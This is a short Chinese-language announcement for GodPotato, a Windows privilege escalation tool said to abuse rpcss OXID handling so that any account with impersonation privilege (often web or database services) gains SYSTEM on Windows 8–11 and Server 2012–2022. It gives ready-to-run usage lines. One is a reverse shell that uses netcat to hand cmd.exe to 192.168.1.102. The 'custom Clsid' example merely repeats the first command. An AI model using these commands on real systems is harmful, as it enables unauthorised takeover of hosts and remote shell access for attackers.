基于Potato提权6年的历史,从RottenPotato开始到JuicyPotatoNG结束,我通过研究DCOM发现了一个新技术,可以在Windows 2012-Windows 2022中实现提权。

rpcss在处理oxid时存在一些缺陷,rpcss是系统必须开启的服务,因此它几乎可以在任何 Windows 操作系统上运行,我将其命名为 GodPotato。

现在只要你有” ImpersonatePrivilege”权限,那你就是“NT AUTHORITY\SYSTEM”,通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。


 

受影响版本:

  •  
  •  
Windows8 - Windows 11Windows Server 2012 - Windows Server 2022


 

使用程序内置的Clsid进行权限升级,执行一个简单的命令

  •  
GodPotato -cmd "cmd /c whoami"

定制Clsid和执行命令

  •  
GodPotato -cmd "cmd /c whoami"

执行反向的shell命令

  •  
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
下载地址